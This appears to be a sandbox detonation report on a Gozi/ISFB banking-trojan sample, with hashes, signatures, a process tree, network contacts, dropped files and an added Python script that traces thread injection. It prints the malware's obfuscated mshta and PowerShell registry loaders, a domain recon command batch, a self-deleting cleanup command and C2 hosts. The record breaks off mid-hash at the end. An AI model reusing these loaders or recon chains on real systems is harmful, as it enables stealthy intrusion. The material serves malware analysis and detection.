C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | 766ff9c99171ebf938ce8d3a17ac1fe5 |
| SHA1 | 30e12b883b152f9d77bf273f38b200fb622f3a9d |
| SHA256 | 3ba2453407c06d1fb6f7b5d2c1d5745d3ca25be086da929dd6d2f66ccc5b12c2 |
| SHA512 | ca526a7e7f751a88d389a4f1ef3680bd3391e619120edf81f5a83747191b5229e3afb53d21417bf93a683f827f208013b4516270e9b585862ff46742a9822ea5 |
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | 3a3202748358acc455e7bdee47cc4f06 |
| SHA1 | 378db81921e78e5d18ddb2ff2056ca5907e7db7e |
| SHA256 | d55d6a83c8aadbd4c21232a792d6e8c6911b71d9e2b49ef2125c74b66d1e2344 |
| SHA512 | 260c3f6f72492cec27d72ce9e1695d801fefccdc62388c1041171fe539db3cf08bf2e7eda602178ddafef27ff93595b2f7f65617642f1492405e7bc7a84eb2e9 |
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | 4a0fd412bd5a4903526e164cc50733e0 |
| SHA1 | 9ef4def111c2d9953a18f072fadeb8a58e10f045 |
| SHA256 | c5025db53067a1cf22946f28df5eda642aad04fc8165617896c35e17dbb3532e |
| SHA512 | 726ab97eb318442b382559f5e61d589368ce259cfa342a27c928cb70f4841809d2cfedb18c50719a4ec0b3db0dca7ff7d35050052fa3d2d2927f727e25072248 |
C:\Users\Admin\AppData\Local\Temp\4868.bin1
| MD5 | f289ecb66ce7d70db5db77c1d5082afb |
| SHA1 | e9f9cb5049e3546cfee5817b99a0c2157e875fb4 |
| SHA256 | a5e5ec5592feefc624be602b27b3aa553700e4e4a14437ed66cc033674a45b17 |
| SHA512 | ba047670bf5d09e0a99b01561a4331ec865227430180db67f4c62ddd0f8197fd8cb0cd28d0aecbfb81b12db382b5498050622431b7c292c245cef60d3c37a368 |
C:\Users\Admin\AppData\Local\Temp\4868.bin
| MD5 | f289ecb66ce7d70db5db77c1d5082afb |
| SHA1 | e9f9cb5049e3546cfee5817b99a0c2157e875fb4 |
| SHA256 | a5e5ec5592feefc624be602b27b3aa553700e4e4a14437ed66cc033674a45b17 |
| SHA512 | ba047670bf5d09e0a99b01561a4331ec865227430180db67f4c62ddd0f8197fd8cb0cd28d0aecbfb81b12db382b5498050622431b7c292c245cef60d3c37a368 |
Analysis: behavioral2
Detonation Overview
Submitted
2022-01-24 10:09
Reported
2022-01-24 10:11
Platform
win10-en-20211208
Max time kernel
151s
Max time network
124s
Command Line
Signatures
Gozi, Gozi IFSB
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\rundll32.exe | N/A |
Suspicious use of SetThreadContext
| Description | Indicator | Process | Target |
| PID 3008 set thread context of 3020 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\Explorer.EXE |
| PID 3020 set thread context of 2304 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\cmd.exe |
| PID 3020 set thread context of 3492 | N/A | C:\Windows\Explorer.EXE | C:\Windows\System32\RuntimeBroker.exe |
| PID 2304 set thread context of 1928 | N/A | C:\Windows\System32\cmd.exe | C:\Windows\system32\PING.EXE |
| PID 3020 set thread context of 1576 | N/A | C:\Windows\Explorer.EXE | C:\Program Files\Windows Mail\WinMail.exe |
| PID 3020 set thread context of 3204 | N/A | C:\Windows\Explorer.EXE | C:\Windows\syswow64\cmd.exe |
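Every process in this table is a signed Windows binary, which is the point: once powershell.exe (PID 3008) has set a thread context in Explorer.EXE (3020), the cmd.exe, PING.EXE, RuntimeBroker.exe and WinMail.exe processes below it all look like ordinary Explorer launches in a parent/child process tree, and the recon batch and the self-delete command run from there. Only the SetThreadContext edges attribute them to the injector. The Python below is an added example for this page, not part of the sandbox output: it rebuilds that attribution from the rows above (transcribed into a constructed list), finds the injection root (a PID that sets contexts in others but never has its own set), lists every PID downstream of it, and returns the chain behind any given PID. The function names are this example's own.

```python
from collections import defaultdict

# Constructed sample: the SetThreadContext rows of the behavioral2 table on this page, transcribed
# as (source_pid, target_pid, source_image, target_image).
SET_THREAD_CONTEXT_EVENTS = [
    (3008, 3020, r'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe', r'C:\Windows\Explorer.EXE'),
    (3020, 2304, r'C:\Windows\Explorer.EXE', r'C:\Windows\System32\cmd.exe'),
    (3020, 3492, r'C:\Windows\Explorer.EXE', r'C:\Windows\System32\RuntimeBroker.exe'),
    (2304, 1928, r'C:\Windows\System32\cmd.exe', r'C:\Windows\system32\PING.EXE'),
    (3020, 1576, r'C:\Windows\Explorer.EXE', r'C:\Program Files\Windows Mail\WinMail.exe'),
    (3020, 3204, r'C:\Windows\Explorer.EXE', r'C:\Windows\syswow64\cmd.exe'),
]


def build_graph(events):
    """Adjacency list injector -> [injected], plus pid -> image path."""
    children, images = defaultdict(list), {}
    for src, dst, src_img, dst_img in events:
        children[src].append(dst)
        images.setdefault(src, src_img)
        images.setdefault(dst, dst_img)
    return children, images


def injection_roots(events):
    """PIDs that set a context in another process but never had their own set: the real origin."""
    sources = {src for src, _, _, _ in events}
    targets = {dst for _, dst, _, _ in events}
    return sorted(sources - targets)


def tainted_pids(events):
    """Every PID reachable from a root through SetThreadContext edges is running injected code."""
    children, _ = build_graph(events)
    seen, stack = set(), list(injection_roots(events))
    while stack:
        for child in children.get(stack.pop(), []):
            if child not in seen:
                seen.add(child)
                stack.append(child)
    return seen


def chain_to(events, pid):
    """Root-to-pid injection chain, or None if pid is not part of any chain."""
    injector = {}
    for src, dst, _, _ in events:
        injector.setdefault(dst, src)  # first injector wins if a PID is hit twice
    if pid not in injector and pid not in injection_roots(events):
        return None
    chain = [pid]
    while chain[-1] in injector and injector[chain[-1]] not in chain:  # cycle guard
        chain.append(injector[chain[-1]])
    return chain[::-1]


def render_tree(events):
    """Indented tree from each root, for the analyst notes."""
    children, images = build_graph(events)
    lines = []

    def walk(pid, depth):
        lines.append(f"{'    ' * depth}{pid}  {images[pid]}")
        for child in children.get(pid, []):
            walk(child, depth + 1)

    for root in injection_roots(events):
        walk(root, 0)
    return '\n'.join(lines)


if __name__ == '__main__':
    print(render_tree(SET_THREAD_CONTEXT_EVENTS))
    print('tainted:', sorted(tainted_pids(SET_THREAD_CONTEXT_EVENTS)))
    print('chain to PING.EXE:', chain_to(SET_THREAD_CONTEXT_EVENTS, 1928))
```

On a live host the same edge has to come from process-access or thread telemetry (an EDR's cross-process write and context-set events), not from parent/child relations, which is why scoping an ISFB infection by process tree alone under-counts: Explorer.EXE itself has a clean lineage here and is the hub of the whole chain.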
Enumerates physical storage devices
Discovers systems in the same network
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
| N/A | N/A | C:\Windows\system32\net.exe | N/A |
Enumerates processes with tasklist
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\tasklist.exe | N/A |
Gathers system information
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\systeminfo.exe | N/A |
Runs net.exe
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: CmdExeWriteProcessMemorySpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious behavior: MapViewOfSection
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\System32\cmd.exe | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\system32\tasklist.exe | N/A |
| Token: SeShutdownPrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
| Token: SeCreatePagefilePrivilege | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\Explorer.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Windows\System32\RuntimeBroker.exe
C:\Windows\System32\RuntimeBroker.exe -Embedding
C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
C:\Windows\system32\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
C:\Windows\SysWOW64\rundll32.exe
rundll32.exe C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll,#1
C:\Windows\System32\mshta.exe
"C:\Windows\System32\mshta.exe" "about:<hta:application><script>Luo9='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Luo9).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\EC96820B-5BA5-FE9A-45E0-BF1249146366\\\PictureSettings'));if(!window.flag)close()</script>"
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" new-alias -name vawdrha -value gp; new-alias -name yhwgucfiht -value iex; yhwgucfiht ([System.Text.Encoding]::ASCII.GetString((vawdrha "HKCU:Software\AppDataLow\Software\Microsoft\EC96820B-5BA5-FE9A-45E0-BF1249146366").ClassComputer))
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC0BC.tmp" "c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\CSC2A5D04B931C94D14B25922087C28C88.TMP"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.cmdline"
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESC1D5.tmp" "c:\Users\Admin\AppData\Local\Temp\13c1wxhm\CSC393C66B810BE4D87BEC6A12440B7368.TMP"
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /C ping localhost -n 5 && del "C:\Users\Admin\AppData\Local\Temp\61ee6edf7de65.dll"
C:\Windows\system32\PING.EXE
ping localhost -n 5
C:\Windows\system32\cmd.exe
cmd /C "nslookup myip.opendns.com resolver1.opendns.com > C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"
C:\Windows\system32\nslookup.exe
nslookup myip.opendns.com resolver1.opendns.com
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\B9E4.bi1"
C:\Windows\system32\cmd.exe
cmd /C "systeminfo.exe > C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Program Files\Windows Mail\WinMail.exe
"C:\Program Files\Windows Mail\WinMail" OCInstallUserConfigOE
C:\Windows\system32\systeminfo.exe
systeminfo.exe
C:\Windows\syswow64\cmd.exe
"C:\Windows\syswow64\cmd.exe" /C pause dll mail, ,
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\net.exe
net view
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nslookup 127.0.0.1 >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\nslookup.exe
nslookup 127.0.0.1
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "tasklist.exe /SVC >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\tasklist.exe
tasklist.exe /SVC
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "driverquery.exe >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\driverquery.exe
driverquery.exe
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\reg.exe
reg.exe query "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall" /s
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net config workstation >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\net.exe
net config workstation
C:\Windows\system32\net1.exe
C:\Windows\system32\net1 config workstation
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "nltest /domain_trusts /all_trusts >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\nltest.exe
nltest /domain_trusts /all_trusts
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all /domain >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\net.exe
net view /all /domain
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /C "net view /all >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\net.exe
net view /all
C:\Windows\system32\cmd.exe
cmd /C "echo -------- >> C:\Users\Admin\AppData\Local\Temp\2039.bin1"
C:\Windows\system32\cmd.exe
cmd /U /C "type C:\Users\Admin\AppData\Local\Temp\2039.bin1 > C:\Users\Admin\AppData\Local\Temp\2039.bin & del C:\Users\Admin\AppData\Local\Temp\2039.bin1"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | giporedtrip.at | udp |
| KW | 37.34.176.37:80 | giporedtrip.at | tcp |
| KW | 37.34.176.37:80 | giporedtrip.at | tcp |
| KW | 37.34.176.37:80 | giporedtrip.at | tcp |
| US | 8.8.8.8:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| US | 208.67.222.222:53 | resolver1.opendns.com | udp |
| RU | 45.9.20.190:80 | 45.9.20.190 | tcp |
| KW | 37.34.176.37:80 | giporedtrip.at | tcp |
| KW | 37.34.176.37:80 | giporedtrip.at | tcp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 1.0.0.127.in-addr.arpa | udp |
| KW | 37.34.176.37:80 | giporedtrip.at | tcp |
| KW | 37.34.176.37:80 | giporedtrip.at | tcp |
| KW | 37.34.176.37:80 | giporedtrip.at | tcp |
| KW | 37.34.176.37:80 | giporedtrip.at | tcp |
Files
memory/3140-115-0x00000000049C0000-0x00000000049D0000-memory.dmp
memory/3140-116-0x0000000074160000-0x000000007417C000-memory.dmp
memory/3008-126-0x0000014DF37B0000-0x0000014DF37D2000-memory.dmp
memory/3008-131-0x0000014DF3800000-0x0000014DF3802000-memory.dmp
memory/3008-132-0x0000014DF3803000-0x0000014DF3805000-memory.dmp
memory/3008-133-0x0000014DF43E0000-0x0000014DF4456000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.cmdline
| MD5 | 1a0c92d1003713e7c07ccefddaa34a87 |
| SHA1 | aed034fcabf21b2df3f8a47b5c4d0432d8418f09 |
| SHA256 | 8653b4a590fac56f3829025ddefc0b6c8dc911349067491a1aaa6a6e4df457d4 |
| SHA512 | 4b519b7c8141f6d5c56f5ffd4294eefeb6df9e9a9223a2bfbee7f7dd05e02d7d3295dff454575fc674b8ebcff26d1b58fb8e95d931fee5617c1a550793f5007a |
\??\c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.0.cs
| MD5 | 04ca9f3dd2f71bc69a66232592bd29b7 |
| SHA1 | 12724cb97fe30a8b84901648b3653b9ac8fb2f73 |
| SHA256 | dbc22ffc06ebcb8f7e00bb962ca175effbbdf0debe7a2e4d288a8735c5c27db1 |
| SHA512 | 383c82a91a354a95e9887e9731852788f466c461ea58a016532e4b07a3e19a97c525b4b579b86a4681bf3dbacfa6b65c8f11032b904737c287a6a5498e4eeb4e |
\??\c:\Users\Admin\AppData\Local\Temp\jvwlcj2l\CSC2A5D04B931C94D14B25922087C28C88.TMP
| MD5 | 024173a35744c972050c9ba2a0815be6 |
| SHA1 | 315835e18f177968d2f2a08defe26e7b14c13093 |
| SHA256 | 98305a08e9d286a932f76a8a362599d4f32373c7bd6f64b58a0ec2528581b4d4 |
| SHA512 | b2f8291ec998ba154646e576e7e3b4caa1eeda1a231d2e1982142859dc0ccdcd547667495e9e5b118dc81639565e92ba96327e25297cac77d4948e2cdf435539 |
C:\Users\Admin\AppData\Local\Temp\RESC0BC.tmp
| MD5 | 1c66b543d4caa2e3c99a31c1d5b1bc2c |
| SHA1 | afe51f9d060ea5146b2c86fb08b9f767cfe74b07 |
| SHA256 | 6c36759fa55c97401017d1259f4627c2a4d9053416ce030850df96343b7587c0 |
| SHA512 | 168e689de2e9031b091cd46f745a4b2c9832b7510e5b769d6056fbd4215b2f608325113002a98638516a59def47205a5889e0a6c6c5b04edd3ab1dceb6ad9f50 |
C:\Users\Admin\AppData\Local\Temp\jvwlcj2l\jvwlcj2l.dll
| MD5 | 9655b240cd65d1243adf32765b08abc4 |
| SHA1 | b4674c9ec668a160bb5268d227ce2e7c74cba6e3 |
| SHA256 | f5f2a51576eab45c9956abe455a5a3cd2329751590a80f19be5add82542d4a24 |
| SHA512 | 378152bb7439b1a5287ab0973ac2ccf27ead42ae84c5a669de116cd7e5c31392348c377c866488e760194aed4bf75b94f84b63b01f4c4d9b6f7bdb5565d34c35 |
memory/3008-151-0x0000014DF4360000-0x0000014DF4368000-memory.dmp
\??\c:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.cmdline
| MD5 | d6ce24617d26fcd7a1571d7aee1ba31d |
| SHA1 | 6fc9880d76b1045128e4019ea7b4f87009a7c570 |
| SHA256 | c2cabf9e22d585e300b5b56141009eb0602bb448801cfcbc64499242e94b0914 |
| SHA512 | c3668d71b8df0137298f19d6557c11042b4cd6a093b9fc4f224d359b60266e97219f3e7ab99e6cf2b4e7200b7dd1063a553e68e959d1f564d5b2d65d13712065 |
\??\c:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.0.cs
| MD5 | 35eab9a45b1cc09a0099a179ad3dcfe5 |
| SHA1 | 42939ac7047bc372300fdd21624100e5c9f83b7f |
| SHA256 | eeeecb79a83f234a098d4e685f9649e562ee2c5180da03ce782df3f95d7eb5a7 |
| SHA512 | 03db096cd43e298a526507be3252f718516e26ecb50400d052b9c26e76eb89f950770696f2034fd9031e3421ee5f7e225d985bfd92cc51338ec19854c85017c1 |
\??\c:\Users\Admin\AppData\Local\Temp\13c1wxhm\CSC393C66B810BE4D87BEC6A12440B7368.TMP
| MD5 | bb6c7f2e3be6251fd865caff4682e016 |
| SHA1 | 5dbeebaaa26be09cc921d1d00710303df5335dad |
| SHA256 | 49ca679fc02c6b958fe06ea3a784a130e6c9be537efbcbe1b8517862308238e7 |
| SHA512 | 2d53f44c4dabfd9f50678a7515dca17b793848969d327543e649db93239b86da3ee815a81de0d69cf6cd49167fd482ae7847b03a33bb11f1734322424955e38e |
C:\Users\Admin\AppData\Local\Temp\RESC1D5.tmp
| MD5 | 0b0cfa879eb29ed2849fd4f7daed161d |
| SHA1 | d283f210cb71e4910d73cffd359d5beea120fee6 |
| SHA256 | 99f06e5bf4abde4ee791b8cdbddb6d7d9fd4f95f99b283999bf23d12dc595c4d |
| SHA512 | e63bf11d15c342b93a34533597588dac08e5a1493e0a93415e538c8b969fdc46dfc548d8050e7c12e57972203077d2473e0e2c767af9f62f24df2f2f0d171cdf |
C:\Users\Admin\AppData\Local\Temp\13c1wxhm\13c1wxhm.dll
| MD5 | 2744b5da7811f14c798f67991dcbab48 |
| SHA1 | c445081cecb4b261cf1b3174a12b6381165ed16a |
| SHA256 | 5f1612f1cdfd76d364ecec760ad2d32f08646e2008492a7335e973a705365595 |
| SHA512 | 8c0f3f4ec686cc4b067c3af9c1d20645fbdcd7ce5daa967573fc709134880c819a09912b05b004b33708196ed31fb0bbab936781dc24e03187db98d455f5816b |
memory/3008-157-0x0000014DF4380000-0x0000014DF4388000-memory.dmp
memory/3008-162-0x0000014DF4390000-0x0000014DF43D4000-memory.dmp
memory/2304-173-0x00000183CC8E0000-0x00000183CC8E1000-memory.dmp
memory/2304-174-0x00000183CCB20000-0x00000183CCBD8000-memory.dmp
memory/3020-175-0x0000000000800000-0x0000000000801000-memory.dmp
memory/3020-176-0x0000000000A00000-0x0000000000AB8000-memory.dmp
memory/3492-177-0x000001B160720000-0x000001B160721000-memory.dmp
memory/3492-178-0x000001B1622A0000-0x000001B162358000-memory.dmp
memory/1928-179-0x000002A49D2C0000-0x000002A49D2C1000-memory.dmp
memory/1928-180-0x000002A49D460000-0x000002A49D518000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\B9E4.bi1
| MD5 | 82f12896705faeb1630b62f16d5f5cc8 |
| SHA1 | 9ed376a84dd777c28d4510cd747da4fbbc2ff63b |
| SHA256 | caccfc569992c55c1e532dd816a6e1846281397127c61e3403294d527780a35e |
| SHA512 | e1f04928aea8e710cd34fd6a0580ad9fe2f045485574b1ba4e4e7db376cffd9dacbc15e51f54cb247a85985739b0d70b9e783c1e573ceb8785fc0662be35c379 |
C:\Users\Admin\AppData\Local\Temp\B9E4.bi1
| MD5 | 41a49d1a2a3a8713a12ccf89932d4bb7 |
| SHA1 | b324e8bbcd4ca71a35d0c00ac63c0255e8ec4287 |
| SHA256 | f210a8e30967b13dabe340c45ce4a97e9c94ad74975728eccdd0a27edf29b5fe |
| SHA512 | 1fc256f2068eb9ac32c04bad119e94ba006808fd2be48db397eecf69acd6d8972334f81f8439d6e153a9cb99db618a613f3b0adf2b5784c264b61d4d5c0669b1 |
memory/1576-185-0x00000203DDAB0000-0x00000203DDB68000-memory.dmp
memory/3204-190-0x0000000000EA6CD0-0x0000000000EA6CD4-memory.dmp
memory/3204-201-0x00000000007E0000-0x000000000088A000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | ecb7525f4380cade12b09d9c325f4187 |
| SHA1 | f08ac2cde62dea441f84a457552d77a1e0b38ded |
| SHA256 | 3dda972a01e6fd6eeae8eac8053541e31e013f785fe03b937654c77decbf2655 |
| SHA512 | 5ea4f30a9368af1c54c5819333ad156a6aedde09026530b44ca14496ac8ee8069dbcd6ea52db1d6b8fa17ff1fbf7c40891b905aeb60a7fcd06a65545a80a26ac |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | ecb7525f4380cade12b09d9c325f4187 |
| SHA1 | f08ac2cde62dea441f84a457552d77a1e0b38ded |
| SHA256 | 3dda972a01e6fd6eeae8eac8053541e31e013f785fe03b937654c77decbf2655 |
| SHA512 | 5ea4f30a9368af1c54c5819333ad156a6aedde09026530b44ca14496ac8ee8069dbcd6ea52db1d6b8fa17ff1fbf7c40891b905aeb60a7fcd06a65545a80a26ac |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | 68fcecb9d39760569d7917876931c941 |
| SHA1 | bc440592668432906944912055bbf192fb437c9b |
| SHA256 | c87180547e984f93dd9e0d904a768019bfb08b10a5639fc60590cdb48b5627f0 |
| SHA512 | 3f4ad432802ce2507f57f7d6f64b494ddca96a9d59eafab9d7a39dd26579cea5341061a6929ce3e646672729ba00346c73c71dbc3d46eaeaec53a90d39f5e647 |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | 68fcecb9d39760569d7917876931c941 |
| SHA1 | bc440592668432906944912055bbf192fb437c9b |
| SHA256 | c87180547e984f93dd9e0d904a768019bfb08b10a5639fc60590cdb48b5627f0 |
| SHA512 | 3f4ad432802ce2507f57f7d6f64b494ddca96a9d59eafab9d7a39dd26579cea5341061a6929ce3e646672729ba00346c73c71dbc3d46eaeaec53a90d39f5e647 |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | 5f779c787614c0e2ab1709022d4422b5 |
| SHA1 | 20182276c54c92a01cb608f582da535845d369bd |
| SHA256 | 567c91e83b91232c0f22279c7f5c975d64d12b195a5017727b5e6e4d1c8d8622 |
| SHA512 | c969ba943402d58adfe896815d223d31c7a62aeb25a82f4d21b8f25146ffc36c38d197d05e7e3e848d7a682bca788e8d619ed7b8860485aabe9b51a6a1228cc7 |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | 5f779c787614c0e2ab1709022d4422b5 |
| SHA1 | 20182276c54c92a01cb608f582da535845d369bd |
| SHA256 | 567c91e83b91232c0f22279c7f5c975d64d12b195a5017727b5e6e4d1c8d8622 |
| SHA512 | c969ba943402d58adfe896815d223d31c7a62aeb25a82f4d21b8f25146ffc36c38d197d05e7e3e848d7a682bca788e8d619ed7b8860485aabe9b51a6a1228cc7 |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | 000891e99835670955ee57eb8f2f3ccf |
| SHA1 | d40698655f27a057194112c6799222fec073819f |
| SHA256 | 12ec2e82ae901201ff35d56840038171bfb87187af6eb856c7aa5b3d32fd61a4 |
| SHA512 | 8e36e8ba66d120c9af59da18e815d4755926d706019786da106d4de481a85be29374f65d18d30e7b3916d7a5f2e3700780024cff77bb4f3f47a6aca0996ec84d |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | 000891e99835670955ee57eb8f2f3ccf |
| SHA1 | d40698655f27a057194112c6799222fec073819f |
| SHA256 | 12ec2e82ae901201ff35d56840038171bfb87187af6eb856c7aa5b3d32fd61a4 |
| SHA512 | 8e36e8ba66d120c9af59da18e815d4755926d706019786da106d4de481a85be29374f65d18d30e7b3916d7a5f2e3700780024cff77bb4f3f47a6aca0996ec84d |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | dc80049c2487894cfbe07fe0bd6dce3c |
| SHA1 | b1073f1d62c59d8b7eb55f6b9bf27cddf5afef1b |
| SHA256 | f1d05989ee98018b1f424dbcbc4e3f04f1df5d67c059e8da9b072e5fb4e8e5ed |
| SHA512 | 78cc674ab2644f8b25c1da9244f54c91b625f6831b49c49731b0d96f744190c8765b67b0736c26eee5c010d52925db0edc0f52b70760835a3e1653351adc530c |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | dc80049c2487894cfbe07fe0bd6dce3c |
| SHA1 | b1073f1d62c59d8b7eb55f6b9bf27cddf5afef1b |
| SHA256 | f1d05989ee98018b1f424dbcbc4e3f04f1df5d67c059e8da9b072e5fb4e8e5ed |
| SHA512 | 78cc674ab2644f8b25c1da9244f54c91b625f6831b49c49731b0d96f744190c8765b67b0736c26eee5c010d52925db0edc0f52b70760835a3e1653351adc530c |
C:\Users\Admin\AppData\Local\Temp\2039.bin1
| MD5 | 2111485e2463ae8e43ac97eced0ebb96 |
| SHA1 | 41b545d143687428ff035f76aec73c74bb8426ca |
